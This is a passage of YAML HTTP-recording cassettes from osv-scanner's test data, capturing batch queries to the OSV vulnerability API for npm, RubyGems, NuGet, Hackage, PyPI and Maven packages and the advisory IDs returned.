"GHSA-vfqx-33qm-g869", "modified": "2024-02-18T05:24:26.785781Z" }, { "id": "GHSA-w3f4-3q6j-rh82", "modified": "2024-03-11T05:18:22.727055Z" }, { "id": "GHSA-wh8g-3j2c-rqj5", "modified": "2024-03-15T00:31:15.123603Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-j288-q9x7-2f5v", "modified": "2026-02-04T03:18:02.851501Z" } ] }, { "vulns": [ { "id": "GHSA-7r82-7xv7-xcpj", "modified": "2026-02-04T02:20:49.137443Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-cj7v-27pg-wf7q", "modified": "2026-03-13T22:01:09.359414Z" }, { "id": "GHSA-hmr7-m48g-48f6", "modified": "2026-02-04T03:59:52.327364Z" }, { "id": "GHSA-qh8g-58pp-2wxh", "modified": "2026-02-04T05:13:21.910792Z" }, { "id": "GHSA-wjpw-4j6x-6rwh", "modified": "2026-03-09T11:29:07.402944Z" } ] }, {}, { "vulns": [ { "id": "GHSA-3gh6-v5v9-6v9j", "modified": "2026-02-04T03:12:16.534413Z" }, { "id": "GHSA-gwcr-j4wh-j3cq", "modified": "2026-03-13T21:59:32.515061Z" }, { "id": "GHSA-j26w-f9rq-mr2q", "modified": "2026-02-04T03:32:43.162423Z" } ] }, {}, { "vulns": [ { "id": "GHSA-264p-99wq-f4j6", "modified": "2026-02-04T03:21:48.913313Z" } ] } ] } headers: Content-Length: - "4418" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_Licenses.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 505 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "babel" }, "version": "6.23.0" }, { "package": { "ecosystem": "npm", "name": "human-signals" }, "version": "5.0.0" }, { "package": { "ecosystem": "npm", "name": "ms" }, "version": "2.1.3" }, { "package": { "ecosystem": "npm", "name": "type-fest" }, "version": "4.26.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/Licenses_in_summary_mode_json url: https://api.osv.dev/v1/querybatch 
method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 505 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "babel" }, "version": "6.23.0" }, { "package": { "ecosystem": "npm", "name": "human-signals" }, "version": "5.0.0" }, { "package": { "ecosystem": "npm", "name": "ms" }, "version": "2.1.3" }, { "package": { "ecosystem": "npm", "name": "type-fest" }, "version": "4.26.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/Licenses_with_expressions url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 505 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "babel" }, "version": "6.23.0" }, { "package": { "ecosystem": "npm", "name": "human-signals" }, "version": "5.0.0" }, { "package": { "ecosystem": "npm", "name": "ms" }, "version": "2.1.3" }, { "package": { "ecosystem": "npm", "name": "type-fest" }, "version": "4.26.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/Licenses_with_invalid_expression_in_config url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 505 host: api.osv.dev body: | { "queries": [ { 
"package": { "ecosystem": "npm", "name": "babel" }, "version": "6.23.0" }, { "package": { "ecosystem": "npm", "name": "human-signals" }, "version": "5.0.0" }, { "package": { "ecosystem": "npm", "name": "ms" }, "version": "2.1.3" }, { "package": { "ecosystem": "npm", "name": "type-fest" }, "version": "4.26.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/No_license_violations_and_show-all-packages_in_json url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 149 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/No_vulnerabilities_but_license_violations_with_allowlist url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 521 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/No_vulnerabilities_with_license_summary url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 
content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 521 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.8" }, { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/No_vulnerabilities_with_license_summary_in_markdown url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 505 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "babel" }, "version": "6.23.0" }, { "package": { "ecosystem": "npm", "name": "human-signals" }, "version": "5.0.0" }, { "package": { "ecosystem": "npm", "name": "ms" }, "version": "2.1.3" }, { "package": { "ecosystem": "npm", "name": "type-fest" }, "version": "4.26.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/Show_all_Packages_with_license_summary_in_json url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 648 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": 
"Packagist", "name": "league/flysystem" }, "version": "1.0.8" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.99.9" }, { "package": { "ecosystem": "Go", "name": "toolchain" }, "version": "1.99.9" }, { "package": { "ecosystem": "RubyGems", "name": "ast" }, "version": "2.4.2" }, { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/Some_packages_with_ignored_licenses url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 107 body: | { "results": [ { "vulns": [ { "id": "GHSA-9f46-5r25-5wfm", "modified": "2026-03-13T22:01:08.982482Z" } ] }, {}, {}, {}, {} ] } headers: Content-Length: - "107" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 505 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "babel" }, "version": "6.23.0" }, { "package": { "ecosystem": "npm", "name": "human-signals" }, "version": "5.0.0" }, { "package": { "ecosystem": "npm", "name": "ms" }, "version": "2.1.3" }, { "package": { "ecosystem": "npm", "name": "type-fest" }, "version": "4.26.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/Some_packages_with_license_violations_and_show-all-packages_in_json url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 505 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "babel" }, "version": "6.23.0" }, { "package": { "ecosystem": "npm", "name": "human-signals" }, "version": 
"5.0.0" }, { "package": { "ecosystem": "npm", "name": "ms" }, "version": "2.1.3" }, { "package": { "ecosystem": "npm", "name": "type-fest" }, "version": "4.26.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/Some_packages_with_license_violations_in_json url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 144 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/Vulnerabilities_and_all_license_violations_allowlisted url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 95 body: | { "results": [ { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] } ] } headers: Content-Length: - "95" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 144 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/Vulnerabilities_and_license_summary url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 95 body: | { "results": [ { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] } ] } headers: Content-Length: - "95" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 144 host: 
api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Licenses/Vulnerabilities_and_license_violations_with_allowlist url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 95 body: | { "results": [ { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] } ] } headers: Content-Length: - "95" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_LocalDatabases.yaml ================================================ --- version: 2 interactions: [] ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_LocalDatabases_AlwaysOffline.yaml ================================================ --- version: 2 interactions: [] ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_LockfileWithExplicitParseAs.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 149 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_LockfileWithExplicitParseAs/absolute_paths_are_automatically_escaped_on_windows url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 149 host: api.osv.dev body: | { "queries": 
[ { "package": { "ecosystem": "npm", "name": "balanced-match" }, "version": "1.0.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_LockfileWithExplicitParseAs/absolute_paths_work_with_explicit_escaping url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_LockfileWithExplicitParseAs/empty_is_default url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 882 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "has-flag" }, "version": "4.0.0" }, { "package": { "ecosystem": "npm", "name": "wrappy" }, "version": "1.0.2" }, { "package": { "ecosystem": "Packagist", "name": "league/flysystem" }, "version": "1.0.8" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.99.9" }, { "package": { "ecosystem": "Go", "name": "toolchain" }, "version": "1.99.9" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_LockfileWithExplicitParseAs/multiple,_+_output_order_is_deterministic url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 
proto_minor: 0 content_length: 271 body: | { "results": [ {}, {}, { "vulns": [ { "id": "GHSA-9f46-5r25-5wfm", "modified": "2026-03-13T22:01:08.982482Z" } ] }, { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] }, { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] }, {}, {} ] } headers: Content-Length: - "271" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 882 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "has-flag" }, "version": "4.0.0" }, { "package": { "ecosystem": "npm", "name": "wrappy" }, "version": "1.0.2" }, { "package": { "ecosystem": "Packagist", "name": "league/flysystem" }, "version": "1.0.8" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.99.9" }, { "package": { "ecosystem": "Go", "name": "toolchain" }, "version": "1.99.9" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_LockfileWithExplicitParseAs/multiple,_+_output_order_is_deterministic_2 url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 271 body: | { "results": [ {}, {}, { "vulns": [ { "id": "GHSA-9f46-5r25-5wfm", "modified": "2026-03-13T22:01:08.982482Z" } ] }, { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] }, { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] }, {}, {} ] } headers: Content-Length: - "271" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 3 host: api.osv.dev body: | {} headers: Content-Type: - application/json X-Test-Name: 
- TestCommand_LockfileWithExplicitParseAs/one_lockfile_with_local_path url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2 body: | {} headers: Content-Length: - "2" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 760 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "has-flag" }, "version": "4.0.0" }, { "package": { "ecosystem": "npm", "name": "wrappy" }, "version": "1.0.2" }, { "package": { "ecosystem": "Packagist", "name": "league/flysystem" }, "version": "1.0.8" }, { "package": { "ecosystem": "npm", "name": "ansi-html" }, "version": "0.0.1" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.99.9" }, { "package": { "ecosystem": "Go", "name": "toolchain" }, "version": "1.99.9" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_LockfileWithExplicitParseAs/when_an_explicit_parse-as_is_given,_it's_applied_to_that_file url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 189 body: | { "results": [ {}, {}, { "vulns": [ { "id": "GHSA-9f46-5r25-5wfm", "modified": "2026-03-13T22:01:08.982482Z" } ] }, { "vulns": [ { "id": "GHSA-whgm-jr23-g3j9", "modified": "2023-11-08T04:05:08.868477Z" } ] }, {}, {} ] } headers: Content-Length: - "189" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_MoreLockfiles.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 774 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Hackage", "name": "AC-Angle" }, "version": "1.0" }, { "package": { "ecosystem": "Hackage", "name": "ALUT" 
}, "version": "2.4.0.3" }, { "package": { "ecosystem": "Hackage", "name": "ANum" }, "version": "0.2.0.2" }, { "package": { "ecosystem": "Hackage", "name": "Agda" }, "version": "2.6.4.3" }, { "package": { "ecosystem": "Hackage", "name": "Allure" }, "version": "0.11.0.0" }, { "package": { "ecosystem": "Hackage", "name": "biscuit-haskell" }, "version": "0.3.0.0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_MoreLockfiles/cabal.project.freeze url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 105 body: | { "results": [ {}, {}, {}, {}, {}, { "vulns": [ { "id": "HSEC-2024-0009", "modified": "2025-11-14T18:15:43.110342Z" } ] } ] } headers: Content-Length: - "105" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 571 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "NuGet", "name": "AWSSDK.Core" }, "version": "3.7.10.6" }, { "package": { "ecosystem": "NuGet", "name": "Microsoft.Extensions.DependencyInjection" }, "version": "6.0.0" }, { "package": { "ecosystem": "NuGet", "name": "System.Linq.Dynamic.Core" }, "version": "1.3.7" }, { "package": { "ecosystem": "NuGet", "name": "TestLibrary" }, "version": "1.0.0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_MoreLockfiles/depsjson url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 104 body: | { "results": [ {}, {}, { "vulns": [ { "id": "GHSA-4cv2-4hjh-77rx", "modified": "2025-01-27T19:00:52.634361Z" } ] }, {} ] } headers: Content-Length: - "104" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 3215 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "RubyGems", "name": "async" }, "version": "2.23.0" }, { 
"package": { "ecosystem": "RubyGems", "name": "async-dns" }, "version": "1.4.1" }, { "package": { "ecosystem": "RubyGems", "name": "async-http" }, "version": "0.87.0" }, { "package": { "ecosystem": "RubyGems", "name": "async-pool" }, "version": "0.10.3" }, { "package": { "ecosystem": "RubyGems", "name": "console" }, "version": "1.29.2" }, { "package": { "ecosystem": "RubyGems", "name": "fiber-annotation" }, "version": "0.2.0" }, { "package": { "ecosystem": "RubyGems", "name": "fiber-local" }, "version": "1.1.0" }, { "package": { "ecosystem": "RubyGems", "name": "fiber-storage" }, "version": "1.0.0" }, { "package": { "ecosystem": "RubyGems", "name": "geoip" }, "version": "1.6.4" }, { "package": { "ecosystem": "RubyGems", "name": "io-endpoint" }, "version": "0.15.1" }, { "package": { "ecosystem": "RubyGems", "name": "io-event" }, "version": "1.9.0" }, { "package": { "ecosystem": "RubyGems", "name": "io-stream" }, "version": "0.6.1" }, { "package": { "ecosystem": "RubyGems", "name": "json" }, "version": "2.10.1" }, { "package": { "ecosystem": "RubyGems", "name": "metrics" }, "version": "0.12.1" }, { "package": { "ecosystem": "RubyGems", "name": "nokogiri" }, "version": "1.18.2" }, { "package": { "ecosystem": "RubyGems", "name": "process-daemon" }, "version": "1.0.1" }, { "package": { "ecosystem": "RubyGems", "name": "protocol-hpack" }, "version": "1.5.1" }, { "package": { "ecosystem": "RubyGems", "name": "protocol-http" }, "version": "0.49.0" }, { "package": { "ecosystem": "RubyGems", "name": "protocol-http1" }, "version": "0.30.0" }, { "package": { "ecosystem": "RubyGems", "name": "protocol-http2" }, "version": "0.22.1" }, { "package": { "ecosystem": "RubyGems", "name": "racc" }, "version": "1.8.1" }, { "package": { "ecosystem": "RubyGems", "name": "rainbow" }, "version": "2.2.2" }, { "package": { "ecosystem": "RubyGems", "name": "rake" }, "version": "13.2.1" }, { "package": { "ecosystem": "RubyGems", "name": "rubydns" }, "version": "2.0.2" }, { "package": { 
"ecosystem": "RubyGems", "name": "traces" }, "version": "0.15.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_MoreLockfiles/gems.locked url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 526 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-9m3q-rhmv-5q44", "modified": "2026-02-04T03:22:18.343631Z" } ] }, {}, { "vulns": [ { "id": "GHSA-353f-x4gh-cqq8", "modified": "2026-02-04T03:08:45.682451Z" }, { "id": "GHSA-5w6v-399v-w3cc", "modified": "2026-02-04T02:49:28.572138Z" }, { "id": "GHSA-mrxw-mxhj-p664", "modified": "2026-02-04T04:34:58.905946Z" }, { "id": "GHSA-vvfq-8hwr-qm4m", "modified": "2026-02-04T03:58:31.466756Z" }, { "id": "GHSA-wx95-c6cv-8532", "modified": "2026-02-25T10:44:01.279701Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "526" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 325 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "NuGet", "name": "Microsoft.CodeDom.Providers.DotNetCompilerPlatform" }, "version": "1.0.0" }, { "package": { "ecosystem": "NuGet", "name": "Microsoft.Net.Compilers" }, "version": "1.0.0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_MoreLockfiles/packages.config url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 19 body: | { "results": [ {}, {} ] } headers: Content-Length: - "19" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 153 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "NuGet", "name": "Newtonsoft.Json" }, "version": "13.0.3" } ] } headers: Content-Type: - application/json X-Test-Name: - 
TestCommand_MoreLockfiles/packages.lock.json url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 536 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Hackage", "name": "fuzzyset" }, "version": "0.2.4" }, { "package": { "ecosystem": "Hackage", "name": "hasql-pool" }, "version": "1.0.1" }, { "package": { "ecosystem": "Hackage", "name": "jose-jwt" }, "version": "0.10.0" }, { "package": { "ecosystem": "Hackage", "name": "postgresql-libpq" }, "version": "0.10.1.0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_MoreLockfiles/stack.yaml.lock url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 25 body: | { "results": [ {}, {}, {}, {} ] } headers: Content-Length: - "25" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 265 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "PyPI", "name": "emoji" }, "version": "2.14.0" }, { "package": { "ecosystem": "PyPI", "name": "protobuf" }, "version": "4.25.5" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_MoreLockfiles/uv.lock url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 168 body: | { "results": [ {}, { "vulns": [ { "id": "GHSA-7gcm-g887-7qv7", "modified": "2026-02-05T16:35:34.839005Z" }, { "id": "GHSA-8qvm-5x2c-j2w7", "modified": "2026-02-04T03:00:07.684118Z" } ] } ] } headers: Content-Length: - "168" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: 
cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_Transitive.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 9305 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Maven", "name": "com.android.support:animated-vector-drawable" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:appcompat-v7" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:mediarouter-v7" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:palette-v7" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:support-annotations" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:support-v4" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.android.support:support-vector-drawable" }, "version": "24.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-ads" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-ads-lite" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-analytics" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-analytics-impl" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-appinvite" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-auth" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-auth-base" }, "version": "10.0.0" }, { "package": { 
"ecosystem": "Maven", "name": "com.google.android.gms:play-services-awareness" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-base" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-basement" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-cast" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-cast-framework" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-clearcut" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-drive" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-fitness" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-games" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-gass" }, "version": "10.0.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.android.gms:play-services-gcm" }, "version": "10.0.0" }, { "package": { "ecosystem": 